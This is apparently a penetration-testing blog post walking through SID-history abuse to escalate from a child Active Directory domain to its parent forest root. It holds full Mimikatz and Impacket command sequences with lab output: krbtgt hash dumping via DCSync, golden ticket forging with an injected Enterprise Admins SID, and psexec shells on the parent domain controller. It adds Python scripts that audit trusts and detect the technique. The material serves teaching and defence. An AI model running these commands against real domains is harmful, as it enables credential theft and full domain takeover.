Every user account in a Windows domain has an associated Security Identifier (SID). When a user logs into a domain, their SID is placed in the user's access token, and that value is what identity-based authorisation decisions are made against.
Active Directory supports a feature called SID History, which allows a single user account to carry multiple SID values. It is intended for migrating users from a legacy domain to a new domain while ensuring they can still access resources in both.
Manipulating SID history legitimately requires domain administrator privileges in the target domain. However, if an adversary compromises a child domain within a forest, SID history can be abused to gain administrative control of the parent domain.
Trust Enumeration
nltest.exe can be used to enumerate domain trusts. In the output below, a trust exists between bordergate.local (the forest root) and its child domain, child.bordergate.local.
C:\Users\Administrator>nltest /domain_trusts
List of domain trusts:
0: BORDERGATE bordergate.local (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
1: CHILD child.bordergate.local (NT 5) (Forest: 0) (Primary Domain) (Native)
The command completed successfully
Domain trusts can also be enumerated using PowerShell:
Get-ADTrust -Filter *
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=bordergate.local,CN=System,DC=child,DC=bordergate,DC=local
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : bordergate.local
ObjectClass : trustedDomain
ObjectGUID : 006fc34d-9cb6-4d0d-a7f8-6cdfe2fb9e33
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=child,DC=bordergate,DC=local
Target : bordergate.local
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False
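The Get-ADTrust output above carries the two fields that decide whether this attack works against a trust: TrustAttributes (a bit field, here 32, which is WITHIN_FOREST) and SIDFilteringQuarantined. The following Python script is an added example, not code from the original post. It parses Get-ADTrust style "Key : Value" output (the record above is embedded as constructed sample input), decodes the trustAttributes bits as documented in MS-ADTS, and reports trusts on which SID filtering is not quarantined, which is the setting the conclusion refers to as "SID Filtering". The finding wording is this example's own.

```python
"""Audit Get-ADTrust records for trusts that would honour injected SID history.

Added example, not part of the original post. Field names follow the
Get-ADTrust output; the findings and their wording are this script's own.
"""
import re

# trustAttributes bit flags as defined in MS-ADTS (trustAttributes attribute).
TRUST_ATTRIBUTES = {
    0x0001: "NON_TRANSITIVE",
    0x0002: "UPLEVEL_ONLY",
    0x0004: "QUARANTINED_DOMAIN",   # SID filtering quarantined on this trust
    0x0008: "FOREST_TRANSITIVE",
    0x0010: "CROSS_ORGANIZATION",
    0x0020: "WITHIN_FOREST",        # parent/child or tree-root trust
    0x0040: "TREAT_AS_EXTERNAL",
    0x0080: "USES_RC4_ENCRYPTION",
    0x0200: "CROSS_ORGANIZATION_NO_TGT_DELEGATION",
    0x0400: "PIM_TRUST",
    0x0800: "CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION",
}

# Constructed sample input: the trust record shown in the post, trimmed to the
# fields the audit uses. Records in real output are separated by blank lines.
SAMPLE_GET_ADTRUST_OUTPUT = """\
Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=bordergate.local,CN=System,DC=child,DC=bordergate,DC=local
ForestTransitive : False
IntraForest : True
Name : bordergate.local
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=child,DC=bordergate,DC=local
Target : bordergate.local
TrustAttributes : 32
TrustType : Uplevel
"""


def parse_trust_records(text):
    """Split Get-ADTrust style output into a list of {field: value} dicts.
    A field with no value (e.g. 'TrustedPolicy :') is kept as an empty string."""
    records, current = [], {}
    for line in text.splitlines():
        m = re.match(r"^\s*(\w+)\s*:\s*(.*?)\s*$", line)
        if m:
            current[m.group(1)] = m.group(2)
        elif not line.strip() and current:
            records.append(current)
            current = {}
    if current:
        records.append(current)
    return records


def decode_trust_attributes(value):
    """Return the set of flag names present in a trustAttributes integer."""
    value = int(value)
    return {name for bit, name in TRUST_ATTRIBUTES.items() if value & bit}


def audit_trust(record):
    """Return findings for one trust record.

    The condition mirrors the one abused in the post: a trust without SID
    filtering quarantine honours other-domain SIDs carried in a ticket's SID
    history, so an intra-forest trust in that state lets a child domain reach
    the parent's Enterprise Admins SID."""
    findings = []
    flags = decode_trust_attributes(record.get("TrustAttributes", "0"))
    quarantined = (
        "QUARANTINED_DOMAIN" in flags
        or record.get("SIDFilteringQuarantined", "False").lower() == "true"
    )
    label = f"{record.get('Source', '?')} -> {record.get('Target', '?')}"
    if not quarantined:
        scope = "intra-forest" if "WITHIN_FOREST" in flags else "cross-forest"
        findings.append(
            f"{label}: {scope} trust without SID filtering quarantine "
            f"(trustAttributes={sorted(flags)})"
        )
    if "USES_RC4_ENCRYPTION" in flags:
        findings.append(f"{label}: trust uses RC4 keys")
    return findings


def audit_text(text):
    """Audit every record in a block of Get-ADTrust output."""
    return [f for rec in parse_trust_records(text) for f in audit_trust(rec)]


if __name__ == "__main__":
    for finding in audit_text(SAMPLE_GET_ADTRUST_OUTPUT):
        print(finding)
```

Run it over the saved output of Get-ADTrust -Filter * from each domain in the forest; every trust it lists is one on which the /sids value in the golden ticket below would be accepted. Note that quarantining an intra-forest trust is not the default and changes how migrated accounts resolve, so the finding is a prompt to review the trust, not an automatic fix.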
Exploiting SID History with Windows
Using a combination of PowerView and Mimikatz we can carry out a SID history attack from Windows. The following details need to be gathered:
- The FQDNs of the child and parent domains
- The child and parent domains' SID values
- The RC4 or AES key of the child domain's KRBTGT account
FQDN Extraction with PowerView
PS C:\Users\Administrator\Desktop> . .\PowerView.ps1
PS C:\Users\Administrator\Desktop> Get-NetDomainTrust
SourceName : child.bordergate.local
TargetName : bordergate.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 27/01/2024 11:03:26
WhenChanged : 27/01/2024 11:03:26
PS C:\Users\Administrator\Desktop> Get-NetForestDomain
Forest : bordergate.local
DomainControllers : {DC01.bordergate.local}
Children : {child.bordergate.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent :
PdcRoleOwner : DC01.bordergate.local
RidRoleOwner : DC01.bordergate.local
InfrastructureRoleOwner : DC01.bordergate.local
Name : bordergate.local
Forest : bordergate.local
DomainControllers : {CDC01.child.bordergate.local}
Children : {}
DomainMode : Unknown
DomainModeLevel : 7
Parent : bordergate.local
PdcRoleOwner : CDC01.child.bordergate.local
RidRoleOwner : CDC01.child.bordergate.local
InfrastructureRoleOwner : CDC01.child.bordergate.local
Name : child.bordergate.local
Determining the Parent and Child Domain SIDs
PowerView’s Get-DomainSID can be used for this purpose.
PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain child.bordergate.local
S-1-5-21-3282285589-3699175333-1759823265
PS C:\Users\Administrator\Desktop> Get-DomainSID -Domain bordergate.local
S-1-5-21-678665010-2561942565-514098031
KRBTGT Extraction with Mimikatz
We can extract the KRBTGT hash of the child domain using the following Mimikatz one-liner.
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:CHILD\krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /user:CHILD\krbtgt
[DC] 'child.bordergate.local' will be the domain
[DC] 'CDC01.child.bordergate.local' will be the DC server
[DC] 'CHILD\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 27/01/2024 11:04:06
Object Security ID : S-1-5-21-3282285589-3699175333-1759823265-502
Object Relative ID : 502
Credentials:
Hash NTLM: b3a2319d94fe4aeae0f1fd5b017eed82
ntlm- 0: b3a2319d94fe4aeae0f1fd5b017eed82
lm - 0: 572c05076819c0d36b6d2e30b8b7f5b3
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 92aa3fc70fca259306071a788a8c48c2
mimikatz(commandline) # exit
Bye!
Carrying out the Attack
At this point, we have collected the following details:
| Requirement | Value |
| --- | --- |
| Parent domain FQDN | bordergate.local |
| Child domain FQDN | child.bordergate.local |
| Parent domain SID | S-1-5-21-678665010-2561942565-514098031 |
| Child domain SID | S-1-5-21-3282285589-3699175333-1759823265 |
| Child domain KRBTGT RC4 | b3a2319d94fe4aeae0f1fd5b017eed82 |
We will also need the parent domain's Enterprise Admins SID. Since its RID is a well-known value (519), we can simply append it to the parent domain SID: S-1-5-21-678665010-2561942565-514098031-519
We then use Mimikatz to generate a golden ticket for the child domain with the parent domain's Enterprise Admins SID included in its SID history (the /sids parameter).
C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$
Access is denied.
C:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:child.bordergate.local /sid:S-1-5-21-3282285589-3699175333-1759823265 /sids:S-1-5-21-678665010-2561942565-514098031-519 /rc4:b3a2319d94fe4aeae0f1fd5b017eed82 /ticket:ticket.kirbi /ptt
User : Administrator
Domain : child.bordergate.local (CHILD)
SID : S-1-5-21-3282285589-3699175333-1759823265
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-678665010-2561942565-514098031-519 ;
ServiceKey: b3a2319d94fe4aeae0f1fd5b017eed82 - rc4_hmac_nt
Lifetime : 27/01/2024 14:26:25 ; 24/01/2034 14:26:25 ; 24/01/2034 14:26:25
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ child.bordergate.local' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
C:\Users\Administrator\Desktop>dir \\DC01.bordergate.local\C$
Volume in drive \\DC01.bordergate.local\C$ has no label.
Volume Serial Number is 2CAB-3D22
Directory of \\DC01.bordergate.local\C$
08/05/2021 08:20 <DIR> PerfLogs
27/01/2024 09:30 <DIR> Program Files
08/05/2021 09:40 <DIR> Program Files (x86)
27/01/2024 09:23 <DIR> Users
27/01/2024 13:57 <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 40,117,248,000 bytes free
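The ticket above authenticates as CHILD\Administrator, yet the token built on DC01 carries the parent domain's Enterprise Admins SID. That mismatch, an account from one domain whose token holds a privileged group SID from another, is the detectable footprint of the technique. The following Python script is an added example, not code from the original post. The event records are constructed to resemble what a SIEM exposes from Windows Security event 4627 (Group membership information), which lists every group SID in a new logon's token; the field names used here are assumptions of this example, not a fixed schema.

```python
"""Flag logons whose token holds privileged SIDs from a domain other than the
account's own, the footprint of the SID-history injection shown in the post.

Added example, not part of the original post. Event field names are assumed;
the sample records are constructed from the SIDs in the post.
"""
import re

# Well-known RIDs that an injected SID would most plausibly name.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

# Domain SIDs look like S-1-5-21-<a>-<b>-<c>-<rid>; built-in (S-1-5-32-...)
# and universal (S-1-1-0) SIDs deliberately do not match.
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")


def split_domain_sid(sid):
    """Return (domain_sid, rid) for a domain SID, or (None, None) otherwise."""
    m = SID_RE.match(sid)
    if not m:
        return None, None
    rid = int(m.group(1))
    return sid[: -(len(m.group(1)) + 1)], rid


def foreign_privileged_sids(account_sid, group_sids):
    """List (sid, group name) for group SIDs that belong to a different domain
    than the account and name a privileged RID. A legitimately migrated user
    may carry plain foreign SIDs, so only privileged RIDs are reported."""
    home_domain, _ = split_domain_sid(account_sid)
    hits = []
    for sid in group_sids:
        domain, rid = split_domain_sid(sid)
        if domain is None or domain == home_domain:
            continue
        if rid in PRIVILEGED_RIDS:
            hits.append((sid, PRIVILEGED_RIDS[rid]))
    return hits


def detect(events):
    """Return [(event, hits)] for every event carrying a foreign privileged SID."""
    results = []
    for event in events:
        hits = foreign_privileged_sids(event["TargetUserSid"], event["GroupMembership"])
        if hits:
            results.append((event, hits))
    return results


# Constructed sample events (assumed 4627-style field names). The first mirrors
# the golden ticket in the post: CHILD\Administrator (RID 500) with the child
# domain's groups plus the parent's Enterprise Admins SID as an extra SID. The
# second is an ordinary logon by the parent domain's own Administrator.
SAMPLE_EVENTS = [
    {
        "EventID": 4627,
        "Computer": "DC01.bordergate.local",
        "TargetUserName": "Administrator",
        "TargetDomainName": "CHILD",
        "TargetUserSid": "S-1-5-21-3282285589-3699175333-1759823265-500",
        "GroupMembership": [
            "S-1-5-21-3282285589-3699175333-1759823265-513",
            "S-1-5-21-3282285589-3699175333-1759823265-512",
            "S-1-5-21-3282285589-3699175333-1759823265-520",
            "S-1-5-21-3282285589-3699175333-1759823265-518",
            "S-1-5-21-3282285589-3699175333-1759823265-519",
            "S-1-5-21-678665010-2561942565-514098031-519",
            "S-1-5-32-544",
            "S-1-1-0",
        ],
    },
    {
        "EventID": 4627,
        "Computer": "DC01.bordergate.local",
        "TargetUserName": "Administrator",
        "TargetDomainName": "BORDERGATE",
        "TargetUserSid": "S-1-5-21-678665010-2561942565-514098031-500",
        "GroupMembership": [
            "S-1-5-21-678665010-2561942565-514098031-513",
            "S-1-5-21-678665010-2561942565-514098031-512",
            "S-1-5-21-678665010-2561942565-514098031-519",
            "S-1-5-32-544",
        ],
    },
]

if __name__ == "__main__":
    for event, hits in detect(SAMPLE_EVENTS):
        print(f"{event['Computer']}: {event['TargetDomainName']}\\{event['TargetUserName']} "
              f"token holds foreign privileged SIDs {hits}")
```

Only the first record is reported: the child Administrator's own 519 is in its home domain and is ignored, while S-1-5-21-678665010-2561942565-514098031-519 is a parent-domain SID on a child-domain account. Run on domain controllers of the parent domain, where this logon lands, this gives a signal independent of which tool built the ticket; the other variant of the technique, writing SID history onto an account object, is logged separately as Security event 4765 (SID History was added to an account).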
Attacking with Linux
The same attack can also be launched from a Linux system:
Determining the Parent and Child Domain SIDs
└─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.205 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-678665010-2561942565-514098031
┌──(kali㉿kali)-[~/forest-trust-tools]
└─$ impacket-lookupsid CHILD/Alice:Password1@192.168.1.240 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-3282285589-3699175333-1759823265
KRBTGT Extraction with Impacket-secretsdump
impacket-secretsdump CHILD/Alice:Password1@192.168.1.240 -just-dc-user CHILD/krbtgt
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93
krbtgt:aes128-cts-hmac-sha1-96:10270f335d0d6b548e1842ea0e6733c6
krbtgt:des-cbc-md5:0d640e94da8c4915
[*] Cleaning up...
Carrying out the Attack
┌──(kali㉿kali)-[~]
└─$ impacket-ticketer -nthash b3a2319d94fe4aeae0f1fd5b017eed82 -domain child.bordergate.local -domain-sid S-1-5-21-3282285589-3699175333-1759823265 -extra-sid S-1-5-21-678665010-2561942565-514098031-519 Administrator
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for child.bordergate.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@CHILD.BORDERGATE.LOCAL
Valid starting Expires Service principal
27/01/24 15:02:23 24/01/34 15:02:23 krbtgt/CHILD.BORDERGATE.LOCAL@CHILD.BORDERGATE.LOCAL
renew until 24/01/34 15:02:23
┌──(kali㉿kali)-[~]
└─$ impacket-psexec CHILD.bordergate.local/Administrator@dc01.bordergate.local -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on dc01.bordergate.local.....
[*] Found writable share ADMIN$
[*] Uploading file pijDaCeK.exe
[*] Opening SVCManager on dc01.bordergate.local.....
[*] Creating service PYVP on dc01.bordergate.local.....
[*] Starting service PYVP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Note: when using impacket-psexec it's important to use the domain FQDN for the user, otherwise you will likely receive the following error: "[-] [Errno Connection error (CHILD:88)] [Errno -3] Temporary failure in name resolution"
Automated Exploitation
impacket-raiseChild is an Impacket script that automates gathering the required details and obtaining command execution on the parent domain controller:
impacket-raiseChild -target-exec 192.168.1.205 child.bordergate.local/alice:'Password1'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Raising child domain child.bordergate.local
[*] Forest FQDN is: bordergate.local
[*] Raising child.bordergate.local to bordergate.local
[*] bordergate.local Enterprise Admin SID is: S-1-5-21-678665010-2561942565-514098031-519
[*] Getting credentials for child.bordergate.local
child.bordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b3a2319d94fe4aeae0f1fd5b017eed82:::
child.bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:dabdbd6e19f848dfc0eadf1f7445e1d1a12eb5ea33de99ec30500fef4ace7a93
[*] Getting credentials for bordergate.local
bordergate.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:48aae46c1e41eca204a6aa70a6aedd48:::
bordergate.local/krbtgt:aes256-cts-hmac-sha1-96s:2b52d519771b9b1266342151af0cc8e646d66d4a6baa59c2d443f4445b6acf0f
[*] Target User account name is Administrator
bordergate.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
bordergate.local/Administrator:aes256-cts-hmac-sha1-96s:bb9930dc9a2266e2491cdb468d6eb7441d87053fd483b8ff2473545fc71b3482
[*] Opening PSEXEC shell at DC01.bordergate.local
[*] Requesting shares on DC01.bordergate.local.....
[*] Found writable share ADMIN$
[*] Uploading file qdrQNfow.exe
[*] Opening SVCManager on DC01.bordergate.local.....
[*] Creating service pWac on DC01.bordergate.local.....
[*] Starting service pWac.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
DC01
C:\Windows\system32>whoami
nt authority\system
In Conclusion
Domains are not intended to be a security boundary, and there are numerous other ways to escalate from a child domain to its parent. Enabling SID Filtering on the trust would partly mitigate this particular attack: it strips SIDs belonging to other domains out of the SID history presented across the trust, so the injected Enterprise Admins SID would be discarded. In the Get-ADTrust output above, SIDFilteringQuarantined : False shows that it is not enabled on this intra-forest trust.